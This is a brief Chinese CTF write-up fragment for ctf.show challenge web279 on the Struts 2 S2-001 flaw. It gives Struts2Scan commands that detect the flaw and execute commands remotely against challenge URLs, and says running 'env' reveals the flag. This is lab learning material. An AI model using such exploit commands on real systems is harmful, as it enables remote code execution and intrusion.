web279-300

史上最全Struts 2漏洞复现过程及PoC合集

web279(struts2漏洞 S2-001)

Vulhub漏洞系列:struts2漏洞 S2-001

刚开始只学了基础的Java类,Poc中的一些构造方法还未接触,所以刚开始用了Struts2Scan通杀脚本

检测:

python Struts2Scan.py -u http://08c8e9cf-4a7b-458f-b75b-2f2bdeae6c1b.chall.ctf.show:8080/S2-001/login.action

利用:

python Struts2Scan.py -u http://22350c9d-7de9-4d0c-9e56-b26cd771f1dd.challenge.ctf.show/S2-001/login.action -n S2-001 --exec

执行命令env即可得到flag

这集贸太难了,先缓缓